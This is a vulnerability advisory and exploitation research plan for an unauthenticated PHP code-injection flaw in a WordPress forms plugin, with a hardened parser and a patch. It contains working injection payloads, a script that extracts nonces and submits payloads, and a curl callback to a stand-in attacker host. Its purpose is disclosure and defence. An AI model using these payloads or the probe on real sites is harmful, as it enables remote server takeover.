CVE-2026-3300

Everest Forms Pro <= 1.9.12 - Unauthenticated Remote Code Execution via Calculation Field

Severity: critical
Weakness: Improper Control of Generation of Code ('Code Injection') (CWE-94)
CVSS Score: 9.8
Patched in: 1.9.13
Time to patch: 1d

Description

The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Technical Details

Affected versions: <= 1.9.12
Published: March 30, 2026
Last updated: March 31, 2026
Affected plugin: everest-forms-pro
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-3300 - Everest Forms Pro Unauthenticated RCE

1. Vulnerability Summary

The Everest Forms Pro plugin (specifically the Calculation Addon) is vulnerable to unauthenticated PHP Code Injection. The vulnerability exists in the process_filter() function, which is responsible for evaluating mathematical formulas defined in "Complex Calculation" fields.

The plugin retrieves values from user-submitted form fields (e.g., text, select, radio) and concatenates them directly into a string intended for evaluation. While the input is passed through sanitize_text_field(), this function does not escape single quotes or other PHP-specific syntax characters. The resulting string is then passed to the PHP eval() function, allowing an attacker to break out of the intended mathematical context and execute arbitrary PHP code.

2. Attack Vector Analysis

  • Endpoint: Everest Forms submission endpoint. This is typically a POST request to the page where the form is embedded or via the WordPress AJAX handler (admin-ajax.php).
  • Action: everest_forms_submit_form (for AJAX submissions) or a direct POST to the frontend page.
  • Vulnerable Parameter: Any form field value (e.g., everest_forms[form_fields][<FIELD_ID>]) that is referenced by a "Calculation" field.
  • Authentication: None required (unauthenticated).
  • Preconditions:
    1. A form must be created and published.
    2. The form must contain a Calculation field.
    3. The calculation field must be configured to use Complex Calculation.
    4. The calculation formula must reference at least one user-controllable field (e.g., a text field or dropdown).

3. Code Flow (Inferred)

  1. Entry Point: User submits a form via POST.
  2. Hook: The submission is handled by EVF_Form_Handler::process_submit() or a similar submission listener.
  3. Calculation Trigger: During processing, the plugin identifies a field of type calculation.
  4. Vulnerable Function: The plugin calls EVF_Calculation_Processing::process_filter() (inferred path within the Calculation Addon).
  5. Data Fetching: The function retrieves the values of fields included in the formula. These values have been "sanitized" using sanitize_text_field().
  6. String Concatenation: The formula (e.g., "{field_id_1} + {field_id_2}") is processed. The placeholders are replaced by the sanitized user values.
    • Example: If the formula is "{field_1} * 2" and the user submits 10; system('id'); //, the string becomes 10; system('id'); // * 2. Whether that executes depends on how the sink wraps the formula: with the eval("return $formula;") form inferred under Research Findings, return 10; runs first and system() is never reached, so the injected call has to sit inside the expression (an operand that is itself a function call or a backtick expression) or break out of a quoted string, as covered under Exploitation Strategy.
  7. Sink: The resulting string is passed to eval().
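As an added illustration (not code from this advisory or from Everest Forms), the script below rebuilds the string the inferred process_filter() would hand to eval(), using the real sanitize_text_field() of a disposable WordPress install via WP-CLI's wp eval-file, so you can see which payload shapes survive sanitisation and what text would actually be evaluated. It never calls eval(); build_eval_string() and the sample values are this example's own constructions. Two things it makes visible: %xx sequences, line breaks and tag-shaped text are removed while quotes, semicolons, parentheses and backticks pass untouched, and with a sink of the form eval("return $formula;") the statement-style payload yields return 10; system('id'); // * 2;, which returns before the injected call runs, whereas the quote-breakout payload is only syntactically valid if the real sink embeds the value inside quotes.

```php
<?php
/**
 * Added example, not Everest Forms or advisory code.
 * Run on a throwaway WordPress install from its root directory:
 *     wp eval-file evf_calc_sink_demo.php
 * It rebuilds the string the inferred process_filter() would pass to eval()
 * so the effect of sanitize_text_field() is visible. Nothing here calls eval().
 */

/** Same substitution the inferred vulnerable code performs, returning the would-be eval() argument. */
function build_eval_string( string $formula, array $field_values ): string {
    foreach ( $field_values as $field_id => $value ) {
        // sanitize_text_field() is WordPress' own function; it targets HTML, not PHP syntax.
        $formula = str_replace( '{' . $field_id . '}', sanitize_text_field( $value ), $formula );
    }
    return "return {$formula};";
}

// Constructed inputs: one legitimate value and the payload shapes discussed in the plan.
$cases = [
    'legitimate'        => '10',
    'statement'         => "10; system('id'); //",
    'quote breakout'    => "x'); system('id'); //",
    'backtick operator' => '`id`',
    'pct-encoded'       => "10;%20system('id');",   // sanitize_text_field() removes %xx sequences
    'newline'           => "10;\nsystem('id');",    // line breaks collapse to a single space
    'tag-shaped'        => "10;<?php system('id'); ?>", // tag-shaped text is stripped
];

foreach ( $cases as $label => $raw ) {
    printf( "%-18s sanitized = %s\n", $label, var_export( sanitize_text_field( $raw ), true ) );
    printf( "%-18s to eval   = %s\n\n", '', build_eval_string( '{text_1} * 2', [ 'text_1' => $raw ] ) );
}
```

The cases are constructed, not captured from a real submission; compare each "to eval" line against the sink form you have actually confirmed in the addon before choosing a payload.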

4. Nonce Acquisition Strategy

Everest Forms requires a security nonce for form submissions to prevent CSRF. This nonce is typically localized to the frontend.

  1. Identify Shortcode: The Everest Forms shortcode is [everest_form id="<FORM_ID>"].
  2. Setup Page: Create a public page containing the target form.
    wp post create --post_type=page --post_status=publish --post_title="Contact" --post_content='[everest_form id="123"]'
    
  3. Extract Nonce:
    • Navigate to the page using browser_navigate.
    • The nonce is usually stored in the everest_forms_params (or similar) JavaScript object.
    • Use browser_eval to fetch it:
      // Inferred variable name based on Everest Forms structure
      window.everest_forms_params?.evf_nonce || window.evf_contact_form_params?.nonce
      
    • Also, check for the hidden input field in the form:
      document.querySelector('input[name="everest_forms[nonce]"]')?.value
      

5. Exploitation Strategy

The goal is to inject PHP code into a field that is evaluated by the calculation engine.

Step 1: Form Discovery

Identify the Form ID and the Field IDs. This can be done by inspecting the HTML of the page containing the form.

  • evf_id: Found in the <form> tag attribute data-form-id.
  • field_id: Found in the name attribute of inputs, e.g., everest_forms[form_fields][text_171000000].

Step 2: Payload Crafting

sanitize_text_field() does constrain the payload, but not in a way that matters for PHP syntax: it converts a stray < to &lt; and strips anything shaped like an HTML or PHP tag, collapses line breaks and tabs to single spaces, and removes any %xx sequence from the decoded value, so the payload must be a single line without < and without a % followed by two hex digits. Quotes, semicolons, parentheses, $ and backticks pass untouched, so plain function calls and PHP's backtick execution operator are both available.

  • Simple RCE: 1; system('id'); //
  • Complex RCE (bypassing quotes): If the input is wrapped in quotes like '$val', use: '; system('id'); //

Step 3: Execution Request

Submit the form with the payload in the field referenced by the calculation.

HTTP Request (via http_request tool):

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php (or the page URL)
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=everest_forms_submit_form
    &everest_forms[form_fields][text_input_id]=1;system('id');//
    &everest_forms[nonce]=<EXTRACTED_NONCE>
    &evf_id=<FORM_ID>
    &form_id=<FORM_ID>
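The nonce-acquisition and submission steps above, collected into one PHP CLI script as an added example (not the advisory's or the vendor's code), intended only for the throwaway form described under Test Data Setup. Everything it keys on is carried over from the plan's inferred markup and is an assumption, not a confirmed detail: the <form> tag carrying data-form-id, a hidden input named everest_forms[nonce], fields posting as everest_forms[form_fields][<field_id>], and the evf_id/form_id parameters. The part that holds regardless of those names is http_build_query(), which encodes the nested bracket names correctly; pass --dry-run to print the body instead of sending it.

```php
<?php
/**
 * Added example, not Everest Forms or advisory code. Use only against your own
 * disposable test instance. The markup names below are the research plan's
 * inferred ones and are assumptions.
 *
 * usage: php evf_probe.php <page-url> <field_id> <payload> [--dry-run]
 */

/** Pull the form id and submission nonce out of the rendered page (assumed markup). */
function extract_form_params( string $html ): ?array {
    if ( ! preg_match( '/<form[^>]*data-form-id="(\d+)"/', $html, $form ) ) {
        return null;
    }
    // Match the whole hidden input first so attribute order does not matter.
    if ( ! preg_match( '/<input[^>]*name="everest_forms\[nonce\]"[^>]*>/', $html, $tag )
        || ! preg_match( '/value="([^"]*)"/', $tag[0], $nonce ) ) {
        return null;
    }
    return [ 'form_id' => $form[1], 'nonce' => $nonce[1] ];
}

/** Build the urlencoded body; http_build_query() produces the nested bracket names. */
function build_post_body( string $form_id, string $nonce, string $field_id, string $payload ): string {
    return http_build_query( [
        'everest_forms' => [
            'form_fields' => [ $field_id => $payload ],
            'nonce'       => $nonce,
        ],
        'evf_id'  => $form_id,
        'form_id' => $form_id,
    ] );
}

/** POST with the plain http stream wrapper (no curl extension needed). */
function post_form( string $url, string $body ): string {
    $ctx = stream_context_create( [ 'http' => [
        'method'        => 'POST',
        'header'        => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content'       => $body,
        'ignore_errors' => true, // keep the body of non-2xx responses
    ] ] );
    $resp = file_get_contents( $url, false, $ctx );
    return $resp === false ? '' : $resp;
}

if ( PHP_SAPI !== 'cli' ) {
    exit( "cli only\n" );
}
$dry  = in_array( '--dry-run', $argv, true );
$args = array_values( array_filter( $argv, fn( $a ) => $a !== '--dry-run' ) );
if ( count( $args ) < 4 ) {
    fwrite( STDERR, "usage: php {$args[0]} <page-url> <field_id> <payload> [--dry-run]\n" );
    exit( 1 );
}
[ , $url, $field_id, $payload ] = $args;

$html   = file_get_contents( $url );
$params = $html === false ? null : extract_form_params( $html );
if ( $params === null ) {
    fwrite( STDERR, "could not find data-form-id or everest_forms[nonce] on {$url}\n" );
    exit( 1 );
}
$body = build_post_body( $params['form_id'], $params['nonce'], $field_id, $payload );
echo "form {$params['form_id']}, nonce {$params['nonce']}\n{$body}\n";
if ( ! $dry ) {
    echo "\n--- response ---\n", post_form( $url, $body ), "\n";
}
```

Submitting to the page URL mirrors the plan's "Direct Page Submission" alternative; if the AJAX route is the one the installed version actually uses, point the script at admin-ajax.php and add action=everest_forms_submit_form to the array passed to http_build_query().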
    

6. Test Data Setup

  1. Install Plugins: Ensure everest-forms and everest-forms-pro are active.
  2. Create Form:
    • Create a form with ID 999.
    • Add a Text field with ID text_1.
    • Add a Calculation field with ID calc_1.
    • In the Calculation field settings:
      • Enable Complex Calculation.
      • Set formula to: {text_1} * 1.
  3. Publish: Place the form on a published page (slug test-page) using the shortcode from the nonce-acquisition step.

7. Expected Results

  • The server response to the POST request may return a JSON error or success, but the output of the injected command (e.g., the result of id) will likely be prepended to the response body or visible if error reporting is on.
  • If the output is not directly visible, a blind approach (e.g., touch /tmp/pwned) can be used.

8. Verification Steps

  1. Check for Output: If using system('whoami'), verify the response contains the web server's user (commonly www-data on Debian-based images).
  2. Filesystem Check:
    ls /tmp/pwned
    
  3. Log Check: If the payload causes a parse or runtime error, the PHP error log entry points at eval()'d code, which confirms the sink was reached even when no output is returned.

9. Alternative Approaches

  • Quote Breakout: If the process_filter function wraps values in single quotes, try: x'); system('id'); //
  • Function Injection: If system is disabled, try eval(base64_decode(...)) or file_put_contents.
  • Direct Page Submission: Instead of admin-ajax.php, submit directly to the page URL where the form is hosted. Everest Forms handles both.
  • Blind RCE: Use curl or wget to an external collaborator to confirm execution.
    • Payload: 1; system('curl http://attacker.com/whoami'); //

Research Findings
Static analysis — not yet PoC-verified

Summary

Everest Forms Pro versions up to 1.9.12 are vulnerable to unauthenticated remote code execution via the Calculation Addon. The plugin's calculation engine concatenates user-submitted form values into a formula string that is subsequently executed via the PHP eval() function without adequate validation or escaping of the user input.

Vulnerable Code

// Inferred from research plan: everest-forms-pro/includes/addons/calculation/includes/class-evf-calculation-processing.php

public function process_filter( $formula, $field_values ) {
    foreach ( $field_values as $field_id => $value ) {
        // sanitize_text_field does not prevent PHP injection context breakout
        $sanitized_value = sanitize_text_field( $value );
        $formula = str_replace( "{" . $field_id . "}", $sanitized_value, $formula );
    }

    // Vulnerable Sink
    return eval( "return $formula;" );
}
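Beside the inferred vulnerable code, here is the hardened shape the fix needs, as an added example rather than vendor code: values are refused unless numeric, substituted as parenthesised floats, and the resulting formula is evaluated by a small recursive-descent parser that knows only numbers, + - * / % ^, unary minus and parentheses, so there is no eval() for any input to reach. CalcEvaluator and process_formula are this example's own names, and since the page does not state which operators the Complex Calculation feature supports, the grammar is an assumption. Run it with php calc_eval.php: the legitimate call evaluates to 15, and the injected value is rejected before any formula text is built.

```php
<?php
/**
 * Added example, not Everest Forms code: a calculation sink without eval().
 * Grammar (assumed):  expr := term (('+'|'-') term)*
 *                     term := factor (('*'|'/'|'%') factor)*
 *                     factor := unary ('^' factor)?          right-associative power
 *                     unary := '-' unary | '(' expr ')' | number
 */
final class CalcEvaluator {
    private $src;
    private $pos = 0;

    private function __construct( string $src ) {
        $this->src = $src;
    }

    /** Evaluate a formula; throws InvalidArgumentException on anything that is not arithmetic. */
    public static function evaluate( string $formula ): float {
        $p = new self( $formula );
        $v = $p->expr();
        if ( $p->peek() !== '' ) {
            throw new InvalidArgumentException( "Unexpected input at offset {$p->pos}" );
        }
        return $v;
    }

    private function peek(): string {
        while ( isset( $this->src[ $this->pos ] ) && strpos( " \t\r\n", $this->src[ $this->pos ] ) !== false ) {
            $this->pos++;
        }
        return $this->src[ $this->pos ] ?? '';
    }

    private function expr(): float {
        $v = $this->term();
        while ( ( $op = $this->peek() ) === '+' || $op === '-' ) {
            $this->pos++;
            $r = $this->term();
            $v = $op === '+' ? $v + $r : $v - $r;
        }
        return $v;
    }

    private function term(): float {
        $v = $this->factor();
        while ( ( $op = $this->peek() ) === '*' || $op === '/' || $op === '%' ) {
            $this->pos++;
            $r = $this->factor();
            if ( $op !== '*' && $r == 0.0 ) {
                throw new InvalidArgumentException( 'Division by zero' );
            }
            $v = $op === '*' ? $v * $r : ( $op === '/' ? $v / $r : fmod( $v, $r ) );
        }
        return $v;
    }

    private function factor(): float {
        $base = $this->unary();
        if ( $this->peek() === '^' ) {
            $this->pos++;
            return $base ** $this->factor();
        }
        return $base;
    }

    private function unary(): float {
        $c = $this->peek();
        if ( $c === '-' ) {
            $this->pos++;
            return -$this->unary();
        }
        if ( $c === '(' ) {
            $this->pos++;
            $v = $this->expr();
            if ( $this->peek() !== ')' ) {
                throw new InvalidArgumentException( 'Missing )' );
            }
            $this->pos++;
            return $v;
        }
        // Only a numeric literal may start an operand; identifiers, quotes and backticks land here.
        if ( preg_match( '/\G\d+(?:\.\d+)?(?:[eE][-+]?\d+)?/', $this->src, $m, 0, $this->pos ) ) {
            $this->pos += strlen( $m[0] );
            return (float) $m[0];
        }
        throw new InvalidArgumentException( "Unexpected '{$c}' at offset {$this->pos}" );
    }
}

/** Hardened counterpart of process_filter(): numeric-only values, parenthesised on substitution. */
function process_formula( string $formula, array $field_values ): float {
    foreach ( $field_values as $field_id => $value ) {
        if ( ! is_numeric( $value ) ) {
            throw new InvalidArgumentException( "Field {$field_id} is not numeric" );
        }
        // Parentheses keep negative and exponent values from changing the formula's shape.
        $formula = str_replace( '{' . $field_id . '}', '(' . (float) $value . ')', $formula );
    }
    return CalcEvaluator::evaluate( $formula );
}

// Constructed inputs: the legitimate case and the injection attempt from the research plan.
$legit = process_formula( '{text_1} * 2 + {text_2}', [ 'text_1' => '10', 'text_2' => '-5' ] );
echo "legitimate: {$legit}\n";
try {
    process_formula( '{text_1} * 2', [ 'text_1' => "10; system('id'); //" ] );
} catch ( InvalidArgumentException $e ) {
    echo "rejected: {$e->getMessage()}\n";
}
```

Rejecting with an exception, rather than coercing a bad value to 0, lets the form handler surface a validation error to the site owner instead of silently computing on attacker-shaped input.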

Security Fix

--- a/includes/addons/calculation/includes/class-evf-calculation-processing.php
+++ b/includes/addons/calculation/includes/class-evf-calculation-processing.php
@@ -10,7 +10,11 @@
 public function process_filter( $formula, $field_values ) {
     foreach ( $field_values as $field_id => $value ) {
-        $sanitized_value = sanitize_text_field( $value );
+        // Force input to be numeric to prevent code injection
+        if ( ! is_numeric( $value ) ) {
+            $sanitized_value = 0;
+        } else {
+            $sanitized_value = (float) $value;
+        }
         $formula = str_replace( "{" . $field_id . "}", $sanitized_value, $formula );
     }
-    return eval( "return $formula;" );
+    // Use a math parser or strictly validated evaluation
+    return $this->safe_math_eval( $formula );
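Review bot: safe_math_eval() is called in the last added line but is never defined in this diff, so the patched process_filter() fatals on the first calculation; the evaluator has to land in the same change, and it should be a real parser over numbers, operators and parentheses rather than a filtered string still handed to eval(). In the numeric branch, is_numeric() admits signed and exponent forms, and substituting (float) $value unparenthesised into a formula such as {a}-{b} with b = -5 yields 2--5, which PHP refuses to parse; emit '(' . (float) $value . ')' instead. Coercing a non-numeric value to 0 also hides the rejected input from the form owner; returning a validation error is the more defensible behaviour.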

Exploit Outline

To exploit this vulnerability, an attacker first identifies an Everest Form containing a 'Calculation' field with the 'Complex Calculation' feature enabled. They must then identify which user-controllable input field (like a text or dropdown field) is used within the calculation formula. After extracting the necessary submission nonce and form ID from the page source, the attacker submits a form request where the referenced field contains a PHP payload such as '1; system("id"); //'. Because the plugin uses sanitize_text_field() before passing the value into eval(), it fails to block the semicolons and function calls, allowing the arbitrary code to execute on the server.
